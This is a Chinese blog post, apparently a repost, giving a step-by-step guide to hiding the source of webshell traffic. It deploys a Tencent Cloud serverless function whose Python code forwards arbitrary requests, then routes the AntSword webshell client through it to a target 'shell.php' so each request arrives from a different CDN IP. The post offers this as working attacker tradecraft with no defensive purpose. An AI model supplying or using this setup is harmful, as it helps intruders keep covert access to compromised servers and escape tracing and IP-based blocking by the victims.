close

原理介紹

這個技術的核心原理是利用騰訊雲的雲函數將我們的請求進行轉發(和一些使用第三方應用進行轉發是一樣的)。在國外應該早就玩爛了。

具體步驟

創建函數

使用默認模板即可,然後選擇下一步。

到這裡也可以全部默認,函數名稱和地域可以自己自由發揮,然後點擊完成。

然後依次打開函數管理 - 函數代碼。

然後把下面代碼替換 index.py 的代碼,點擊部署。

# -*- coding: utf8 -*-import requestsimport jsondef geturl(urlstr): jurlstr = json.dumps(urlstr) dict_url = json.loads(jurlstr)return dict_url['u']def main_handler(event, context): url = geturl(event['queryString']) postdata = event['body'] headers=event['headers'] resp=requests.post(url,data=postdata,headers=headers,verify=False) response={"isBase64Encoded": False,"statusCode": 200,"headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},"body": resp.text }return response

點擊觸發管理,就會看到訪問路徑,複製備用。

開始 Webshell 請求來源隱藏

打開蟻劍,url一欄中填入 訪問路徑 + webshell地址,列如:

https://service-gcuy2k9u-1257053841.gz.apigw.tencentcs.com/release/APIGWHtmlDemo-1614356287?u=https://www.xxx.com/shell.php

其他設置和正常使用配置即可,看看效果。

所有請求都是利用騰訊雲的雲函數將我們的請求進行轉發,雲函數的服務器是自帶 CDN 的,所以我們每次去請求的 Webshell IP 都是不同的,這就達到了 Webshell 請求來源隱藏。

注意

在函數管理 - 函數配置裡面,最好把執行超時時間設置成和蟻劍裡面的超時時間一樣或者更長。

文章來源:白帽兔

侵權請私聊公眾號刪文

熱文推薦

藍隊應急響應姿勢之Linux
通過DNSLOG回顯驗證漏洞
記一次服務器被種挖礦溯源
內網滲透初探 | 小白簡單學習內網滲透
實戰|通過惡意 pdf 執行 xss 漏洞
免殺技術有一套(免殺方法大集結)(Anti-AntiVirus)
內網滲透之內網信息查看常用命令
關於漏洞的基礎知識
任意賬號密碼重置的6種方法
乾貨 | 橫向移動與域控權限維持方法總匯
手把手教你Linux提權

歡迎關注LemonSec

覺得不錯點個「贊」、「在看「

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()